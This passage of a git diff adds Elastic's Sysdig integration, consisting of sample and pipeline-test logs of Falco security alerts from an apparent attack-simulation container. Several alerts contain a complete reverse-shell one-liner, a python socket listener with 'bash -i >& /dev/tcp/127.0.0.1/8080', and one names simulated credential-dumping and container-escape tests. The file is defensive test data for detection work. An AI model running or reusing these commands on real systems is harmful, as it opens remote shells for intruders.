user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)","fields":{"container.name":"threatgen","proc.cmdline":"python3 -c import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();","proc.cwd":"/tmp/","proc.exepath":"/usr/bin/python3.10","proc.name":"python3","proc.pcmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.pid":"2140103","proc.pname":"bash","proc.ppid":"2140101","user.name":"root","user.uid":"0"},"policyVersion":90,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"289645096542","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","gcp.availabilityZone":"us-central1-c","gcp.instanceId":"648229130641697246","gcp.instanceName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","gcp.machineType":"e2-standard-4","gcp.projectId":"289645096542","gcp.projectName":"alliances-chronicle","host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.namespace.name":"default","kubernetes.pod.name":"threatgen-c65cf6446-5s8kk","kubernetes.workload.type":"deployment"}} +{"id":"17e047935c2a5c6118242ab739a6ba5e","type":"audittrail","timestamp":1720453755887574113,"timestampRFC3339Nano":"2024-07-08T15:49:15.887574113Z","originator":"ingestion","category":"","source":"auditTrail","name":"","description":"","severity":0,"containerId":"","machineId":""} +{"id":"17e047939adc188d8ee67f27d98a5929","type":"audittrail","timestamp":1720453756939409549,"timestampRFC3339Nano":"2024-07-08T15:49:16.939409549Z","originator":"ingestion","category":"","source":"auditTrail","name":"","description":"","severity":0,"containerId":"","machineId":""} 
+{"id":"17e047be24848be2ae63efba47ac8869","agentId":57228830,"containerId":"","type":"connection","timestamp":1720453939637554200,"timestampRFC3339Nano":"2024-07-08T15:52:19.637554146Z","labels":{"host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-mbxk"}} +{"id":"17dec38d1ccc838ed8bd3c0690c2a92e","agentId":57841425,"containerId":"","type":"connection","timestamp":1720027118543078400,"timestampRFC3339Nano":"2024-07-03T17:18:38.543078286Z","labels":{"host.hostName":"gke-gke-aliances-test-pa-default-pool-edcdf365-obof"}} +{"id":"17dec30f432914be51fde04f0a93ff8f","agentId":58462617,"containerId":"1eb848eba226","type":"command","timestamp":1720026578020799700,"timestampRFC3339Nano":"2024-07-03T17:09:38.020799678Z","labels":{"host.hostName":"aks-userpool-12996081-vmss000000","kubernetes.cluster.name":"servicenow-test-cluster","kubernetes.namespace.name":"default","kubernetes.pod.name":"playground-86dfdc6cb5-42xgq","kubernetes.workload.type":"deployment"}} +{"id":"17dec30ec6c62db90219722f069818ce","agentId":58462617,"containerId":"1eb848eba226","type":"command","timestamp":1720026575933943300,"timestampRFC3339Nano":"2024-07-03T17:09:35.933943225Z","labels":{"host.hostName":"aks-userpool-12996081-vmss000000","kubernetes.cluster.name":"servicenow-test-cluster","kubernetes.namespace.name":"default","kubernetes.pod.name":"playground-86dfdc6cb5-42xgq","kubernetes.workload.type":"deployment"}} +{"id":"17dec311bcc23cdab41a9d1b874f923f","agentId":58462617,"containerId":"1eb848eba226","type":"fileaccess","timestamp":1720026588650814700,"timestampRFC3339Nano":"2024-07-03T17:09:48.650814682Z","labels":{"host.hostName":"aks-userpool-12996081-vmss000000","kubernetes.cluster.name":"servicenow-test-cluster","kubernetes.namespace.name":"default","kubernetes.pod.name":"playground-86dfdc6cb5-42xgq","kubernetes.workload.type":"deployment"}} 
+{"id":"164806f4c47ad9101117d87f8b574ecf","agentId":32212,"containerId":"397be1762fba","name":"nginx-76f9cf7469-k5kf7","timestamp":1606322948648718268,"timestampRFC3339Nano":"2020-11-25T16:49:08.648718268Z","type":"kubernetes","labels":{"host.hostName":"qa-k8smetrics","kubernetes.cluster.name":"demo-env-prom","kubernetes.namespace.name":"nginx","kubernetes.pod.name":"nginx-76f9cf7469-k5kf7"}} \ No newline at end of file diff --git a/packages/sysdig/changelog.yml b/packages/sysdig/changelog.yml new file mode 100644 index 00000000000..8e5f51ff8cb --- /dev/null +++ b/packages/sysdig/changelog.yml @@ -0,0 +1,6 @@ +# newer versions go on top +- version: "0.1.0" + changes: + - description: Initial release of the Sysdig integration + type: enhancement + link: https://github.com/elastic/integrations/pull/10841 diff --git a/packages/sysdig/data_stream/alerts/_dev/test/pipeline/test-sysdig.log b/packages/sysdig/data_stream/alerts/_dev/test/pipeline/test-sysdig.log new file mode 100644 index 00000000000..fb8957ca56d --- /dev/null +++ b/packages/sysdig/data_stream/alerts/_dev/test/pipeline/test-sysdig.log 
@@ -0,0 +1,15 @@ +{"id":"17dec715376910362c8c3f62a4ceda2e","type":"policy","timestamp":1720031001639981110,"timestampRFC3339Nano":"2024-07-03T18:23:21.63998111Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Activity Logs","description":"This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. Additional manual tuning will likely be required.","severity":7,"agentId":58014837,"containerId":"6949e5f10829","machineId":"42:01:0a:80:00:05","hostMac":"42:01:0a:80:00:05","content":{"ruleName":"User Management Event Detected","ruleType":"RULE_TYPE_FALCO","ruleTags":["host","container","MITRE","MITRE_TA0003_persistence","MITRE_T1136_create_account","MITRE_T1136.001_create_account_local_account","MITRE_T1070_indicator_removal","MITRE_TA0005_defense_evasion","MITRE_TA0040_impact","MITRE_T1531_account_access_removal","MITRE_T1098_account_manipulation"],"output":"Users management command userdel tmp_suid_user launched by pwsh on threatgen under user root (proc.name=userdel proc.args=tmp_suid_user fd.name=\u003cNA\u003e proc.cmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.pname=pwsh gparent=containerd-shim ggparent=\u003cNA\u003e gggparent=\u003cNA\u003e container=container_id=6949e5f10829 container_name=threatgen evt.type=execve evt.arg.request=\u003cNA\u003e proc.pid=2140169 proc.cwd=/tmp/ proc.ppid=2140088 proc.pcmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 
CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.sid=1 proc.exepath=/usr/sbin/userdel user.uid=0 user.loginuid=-1 user.loginname=\u003cNA\u003e user.name=root group.gid=0 group.name=root container.id=6949e5f10829 container.name=threatgen image=docker.io/dockerbadboy/art)","fields":{"container.name":"threatgen","proc.cmdline":"userdel tmp_suid_user","proc.cwd":"/tmp/","proc.exepath":"/usr/sbin/userdel","proc.name":"userdel","proc.pcmdline":"pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC)","proc.pid":"2140169","proc.pname":"pwsh","proc.ppid":"2140088","user.name":"root","user.uid":"0"},"policyVersion":35,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"289645096542","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","gcp.availabilityZone":"us-central1-c","gcp.instanceId":"648229130641697246","gcp.instanceName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","gcp.machineType":"e2-standard-4","gcp.projectId":"289645096542","gcp.projectName":"alliances-chronicle","host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.namespace.name":"default","kubernetes.pod.name":"threatgen-c65cf6446-5s8kk","kubernetes.workload.type":"deployment"}} +{"id":"17dec7142e0084978fbafcb03e2cabca","type":"policy","timestamp":1720030997187167383,"timestampRFC3339Nano":"2024-07-03T18:23:17.187167383Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Notable Events","description":"This Notable Events policy contains rules 
which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.","severity":5,"agentId":58014837,"containerId":"6949e5f10829","machineId":"42:01:0a:80:00:05","hostMac":"42:01:0a:80:00:05","actions":[{"type":"","successful":false,"errMsg":"maximum number of outstanding captures (1) reached","token":"c708ed01-9700-4787-91a5-6b2fb9863c0a","afterEventNs":30000000000,"beforeEventNs":15000000000}],"content":{"ruleName":"Redirect STDOUT/STDIN to Network Connection in Container","ruleType":"RULE_TYPE_FALCO","ruleTags":["container","SOC2","SOC2_CC6.6","SOC2_CC6.7","NIST","NIST_800-53","NIST_800-53_AC-6(9)","NIST_800-53_AC-6(10)","NIST_800-53_AU-6(8)","HIPAA","HIPAA_164.308(a)","HIPAA_164.312(a)","HIPAA_164.312(b)","HITRUST","HITRUST_CSF","HITRUST_CSF_01.c","HITRUST_CSF_09.aa","MITRE","MITRE_TA0002_execution","MITRE_T1059_command_and_scripting_interpreter","MITRE_T1104_multi_stage_channels"],"output":"Redirect stdout/stdin to network connection by process bash with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=bash parent=bash gparent=pwsh ggparent=containerd-shim gggparent=\u003cNA\u003e container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552-\u003e127.0.0.1:8080 fd.num=1 fd.type=ipv4 cmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import 
socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 proc.sid=1 proc.exepath=/usr/bin/bash user.uid=0 user.loginname=\u003cNA\u003e group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)","fields":{"container.name":"threatgen","proc.cmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.cwd":"/tmp/","proc.exepath":"/usr/bin/bash","proc.name":"bash","proc.pcmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.pid":"2140105","proc.pname":"bash","proc.ppid":"2140101","user.name":"root","user.uid":"0"},"policyVersion":90,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"289645096542","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","gcp.availabilityZone":"us-central1-c","gcp.instanceId":"648229130641697246","gcp.instanceName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","gcp.machineType":"e2-standard-4","gcp.projectId":"289645096542","gcp.projectName":"alliances-chronicle","host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.namespace.name":"default","kubernetes.pod.name":"threatgen-c65cf6446-5s8kk","kubernetes.workload.type":"deployment"}} 
+{"id":"17e04791d768c4aba1e9c40d944b8598","type":"policy","timestamp":1720453749365327019,"timestampRFC3339Nano":"2024-07-08T15:49:09.365327019Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Activity Logs","description":"This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. Additional manual tuning will likely be required.","severity":7,"agentId":58462623,"containerId":"8736272bd5fb","machineId":"7c:1e:52:0b:2b:61","hostMac":"7c:1e:52:0b:2b:61","content":{"ruleName":"Drop and execute new binary in container","ruleType":"RULE_TYPE_FALCO","ruleTags":["container","MITRE","MITRE_T1525_implant_internal_image","MITRE_TA0003_persistence"],"output":"Executing binary ruby with parent livenessprobe.s not part of base image mcr.microsoft.com/azuremonitor/containerinsights/ciprod on ama-logs under user root and execution path /usr/bin/ruby (proc.name=ruby proc.pname=livenessprobe.s fd.name=\\u003cNA\\u003e proc.cmdline=ruby /opt/dcr-config-parser.rb proc.pcmdline=livenessprobe.s /opt/livenessprobe.sh gparent=runc ggparent=containerd-shim gggparent=systemd evt.type=execveproc.args=/opt/dcr-config-parser.rb proc.pid=2817268 proc.cwd=/opt/ proc.ppid=2817253 proc.exepath=/usr/bin/ruby user.uid=0 user.loginuid=-1 user.loginname=\\u003cNA\\u003e user.name=root group.gid=0 group.name=root container.id=8736272bd5fb container.name=ama-logs image=mcr.microsoft.com/azuremonitor/containerinsights/ciprod:3.1.21)","fields":{"container.name":"ama-logs","proc.cmdline":"ruby /opt/dcr-config-parser.rb","proc.cwd":"/opt/","proc.exepath":"/usr/bin/ruby","proc.name":"ruby","proc.pcmdline":"livenessprobe.s 
/opt/livenessprobe.sh","proc.pid":"2817268","proc.pname":"livenessprobe.s","proc.ppid":"2817253","user.name":"root","user.uid":"0"},"policyVersion":35,"policyOrigin":"Sysdig"},"labels":{"azure.instanceId":"ba53fc47-1119-4cbb-af2b-6d38b0e56160","azure.instanceName":"aks-userpool-12996081-vmss_1","azure.instanceSize":"Standard_D8ds_v5","cloudProvider.account.id":"7a100e05-8316-474d-99c0-b824d0e86366","cloudProvider.name":"azure","cloudProvider.region":"eastus","host.hostName":"aks-userpool-12996081-vmss000001","kubernetes.cluster.name":"servicenow-test-cluster","kubernetes.namespace.name":"kube-system","kubernetes.pod.name":"ama-logs-cxhbd","kubernetes.workload.type":"daemonset"}} +{"id":"17dec7142e00a9068fb9185f9aa66c21","type":"policy","timestamp":1720030997187176710,"timestampRFC3339Nano":"2024-07-03T18:23:17.18717671Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Notable Events","description":"This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. 
Tuning will likely be required for the events generated from this policy.","severity":5,"agentId":58014837,"containerId":"6949e5f10829","machineId":"42:01:0a:80:00:05","hostMac":"42:01:0a:80:00:05","actions":[{"type":"","successful":false,"errMsg":"maximum number of outstanding captures (1) reached","token":"eb2b3e3c-ebc1-433f-88c7-2e032b75aadc","afterEventNs":30000000000,"beforeEventNs":15000000000}],"content":{"ruleName":"Redirect STDOUT/STDIN to Network Connection in Container","ruleType":"RULE_TYPE_FALCO","ruleTags":["container","SOC2","SOC2_CC6.6","SOC2_CC6.7","NIST","NIST_800-53","NIST_800-53_AC-6(9)","NIST_800-53_AC-6(10)","NIST_800-53_AU-6(8)","HIPAA","HIPAA_164.308(a)","HIPAA_164.312(a)","HIPAA_164.312(b)","HITRUST","HITRUST_CSF","HITRUST_CSF_01.c","HITRUST_CSF_09.aa","MITRE","MITRE_TA0002_execution","MITRE_T1059_command_and_scripting_interpreter","MITRE_T1104_multi_stage_channels"],"output":"Redirect stdout/stdin to network connection by process bash with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=bash parent=bash gparent=pwsh ggparent=containerd-shim gggparent=\u003cNA\u003e container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552-\u003e127.0.0.1:8080 fd.num=0 fd.type=ipv4 cmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 proc.sid=1 proc.exepath=/usr/bin/bash user.uid=0 
user.loginname=\u003cNA\u003e group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)","fields":{"container.name":"threatgen","proc.cmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.cwd":"/tmp/","proc.exepath":"/usr/bin/bash","proc.name":"bash","proc.pcmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.pid":"2140105","proc.pname":"bash","proc.ppid":"2140101","user.name":"root","user.uid":"0"},"policyVersion":90,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"289645096542","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","gcp.availabilityZone":"us-central1-c","gcp.instanceId":"648229130641697246","gcp.instanceName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","gcp.machineType":"e2-standard-4","gcp.projectId":"289645096542","gcp.projectName":"alliances-chronicle","host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.namespace.name":"default","kubernetes.pod.name":"threatgen-c65cf6446-5s8kk","kubernetes.workload.type":"deployment"}} +{"id":"17dec36048564c002c559dbdad20be41","type":"policy","timestamp":1720026926000000000,"timestampRFC3339Nano":"2024-07-03T17:15:26Z","originator":"policy","category":"remote","source":"aws_cloudtrail","name":"Describe Instances - Sysdig AWS Activity Logs","description":"A description of an EC2 instance has been requested by user AutoScaling on region us-east-1 (requesting 
user=AutoScaling, requesting IP=autoscaling.amazonaws.com, account ID=414773805239, AWS region=us-east-1)","severity":7,"containerId":"","machineId":"","content":{"ruleName":"Describe Instances","ruleType":"RULE_TYPE_FALCO","ruleTags":["MITRE_T1082_system_information_discovery","Cloud","AWS","AWS_EC2","MITRE","MITRE_TA0007_discovery","MITRE_T1580_cloud_infrastructure_discovery"],"output":"A description of an EC2 instance has been requested by user AutoScaling on region us-east-1 (requesting user=AutoScaling, requesting IP=autoscaling.amazonaws.com, account ID=414773805239, AWS region=us-east-1)","fields":{"container.name":""},"policyVersion":36,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"414773805239","cloudProvider.name":"aws","cloudProvider.region":"us-east-1"}} +{"id":"17dec7142e051355585daf677e472ed2","type":"policy","timestamp":1720030997187466069,"timestampRFC3339Nano":"2024-07-03T18:23:17.187466069Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Notable Events","description":"This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. 
Tuning will likely be required for the events generated from this policy.","severity":5,"agentId":58014837,"containerId":"6949e5f10829","machineId":"42:01:0a:80:00:05","hostMac":"42:01:0a:80:00:05","actions":[{"type":"","successful":false,"errMsg":"maximum number of outstanding captures (1) reached","token":"81618044-80a5-44af-b27a-46acead3a4bc","afterEventNs":30000000000,"beforeEventNs":15000000000}],"content":{"ruleName":"Privileged Shell Spawned Inside Container","ruleType":"RULE_TYPE_FALCO","ruleTags":["container","shell","SOC2","SOC2_CC6.1","PCI","PCI_DSS","PCI_DSS_10.1","PCI_DSS_10.2.1","NIST","NIST_800-171","NIST_800-171_3.1.1","NIST_800-171_3.1.2","NIST_800-171_3.14.6","NIST_800-171_3.3.1","NIST_800-171_3.3.2","NIST_800-53","NIST_800-53_AC-17","NIST_800-53_AU-6(8)","NIST_800-53_AU-2","NIST_800-53_AC-2(4)","FedRAMP","FedRAMP_AC-2(4)","FedRAMP_AU-2","ISO","ISO_27001","ISO_27001_A.9.4.4","HIPAA","HIPAA_164.308(a)","HIPAA_164.310(b)","HIPAA_164.312(a)","HIPAA_164.312(b)","HITRUST","HITRUST_CSF","HITRUST_CSF_01.i","HITRUST_CSF_01.j","HITRUST_CSF_01.n","HITRUST_CSF_01.p","HITRUST_CSF_01.s","HITRUST_CSF_01.y","HITRUST_CSF_06.i","HITRUST_CSF_09.aa","HITRUST_CSF_09.ab","HITRUST_CSF_09.ad","HITRUST_CSF_09.ae","HITRUST_CSF_09.m","HITRUST_CSF_09.s","GDPR","GDPR_32.1","GDPR_32.2","MITRE","MITRE_T1609_container_administration_command","MITRE_TA0002_execution","MITRE_TA0004_privilege_escalation","MITRE_T1068_exploitation_for_privilege_escalation","CIS"],"output":"Privileged Shell Spawned in Container threatgen with image docker.io/dockerbadboy/art by parent bash with cmdline bash -i under user root (user.uid=0 proc.cmdline=bash -i proc.name=bash proc.pname=bash gparent=pwsh ggparent=containerd-shim gggparent=\u003cNA\u003e proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 
/dev/tcp/127.0.0.1/8080 0\u003e\u00261 user.name=root user.loginuid=-1 proc.args=-i container.name=threatgen evt.type=execve evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.sid=1 proc.exepath=/usr/bin/bash user.loginname=\u003cNA\u003e group.gid=0 group.name=root, container.image=docker.io/dockerbadboy/art)","fields":{"container.name":"threatgen","proc.cmdline":"bash -i","proc.cwd":"/tmp/","proc.exepath":"/usr/bin/bash","proc.name":"bash","proc.pcmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.pid":"2140105","proc.pname":"bash","proc.ppid":"2140101","user.name":"root","user.uid":"0"},"policyVersion":90,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"289645096542","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","gcp.availabilityZone":"us-central1-c","gcp.instanceId":"648229130641697246","gcp.instanceName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","gcp.machineType":"e2-standard-4","gcp.projectId":"289645096542","gcp.projectName":"alliances-chronicle","host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.namespace.name":"default","kubernetes.pod.name":"threatgen-c65cf6446-5s8kk","kubernetes.workload.type":"deployment"}} +{"id":"17dec7142e03c2766a36e7950883c5c4","type":"policy","timestamp":1720030997187379830,"timestampRFC3339Nano":"2024-07-03T18:23:17.18737983Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Notable Events","description":"This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. 
Tuning will likely be required for the events generated from this policy.","severity":5,"agentId":58014837,"containerId":"6949e5f10829","machineId":"42:01:0a:80:00:05","hostMac":"42:01:0a:80:00:05","actions":[{"type":"","successful":false,"errMsg":"maximum number of outstanding captures (1) reached","token":"35cf0ae3-a4ed-4c00-831f-f0b7c8489718","afterEventNs":30000000000,"beforeEventNs":15000000000}],"content":{"ruleName":"Redirect STDOUT/STDIN to Network Connection in Container","ruleType":"RULE_TYPE_FALCO","ruleTags":["container","SOC2","SOC2_CC6.6","SOC2_CC6.7","NIST","NIST_800-53","NIST_800-53_AC-6(9)","NIST_800-53_AC-6(10)","NIST_800-53_AU-6(8)","HIPAA","HIPAA_164.308(a)","HIPAA_164.312(a)","HIPAA_164.312(b)","HITRUST","HITRUST_CSF","HITRUST_CSF_01.c","HITRUST_CSF_09.aa","MITRE","MITRE_TA0002_execution","MITRE_T1059_command_and_scripting_interpreter","MITRE_T1104_multi_stage_channels"],"output":"Redirect stdout/stdin to network connection by process python3 with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=python3 parent=bash gparent=pwsh ggparent=containerd-shim gggparent=\u003cNA\u003e container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552-\u003e127.0.0.1:8080 fd.num=0 fd.type=ipv4 cmdline=python3 -c import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close(); terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140103 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 proc.sid=1 proc.exepath=/usr/bin/python3.10 user.uid=0 user.loginname=\u003cNA\u003e group.gid=0 group.name=root container.name=threatgen user.name=root 
user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)","fields":{"container.name":"threatgen","proc.cmdline":"python3 -c import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();","proc.cwd":"/tmp/","proc.exepath":"/usr/bin/python3.10","proc.name":"python3","proc.pcmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.pid":"2140103","proc.pname":"bash","proc.ppid":"2140101","user.name":"root","user.uid":"0"},"policyVersion":90,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"289645096542","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","gcp.availabilityZone":"us-central1-c","gcp.instanceId":"648229130641697246","gcp.instanceName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","gcp.machineType":"e2-standard-4","gcp.projectId":"289645096542","gcp.projectName":"alliances-chronicle","host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.namespace.name":"default","kubernetes.pod.name":"threatgen-c65cf6446-5s8kk","kubernetes.workload.type":"deployment"}} +{"id":"17e047935c2a5c6118242ab739a6ba5e","type":"audittrail","timestamp":1720453755887574113,"timestampRFC3339Nano":"2024-07-08T15:49:15.887574113Z","originator":"ingestion","category":"","source":"auditTrail","name":"","description":"","severity":0,"containerId":"","machineId":""} +{"id":"17e047939adc188d8ee67f27d98a5929","type":"audittrail","timestamp":1720453756939409549,"timestampRFC3339Nano":"2024-07-08T15:49:16.939409549Z","originator":"ingestion","category":"","source":"auditTrail","name":"","description":"","severity":0,"containerId":"","machineId":""} 
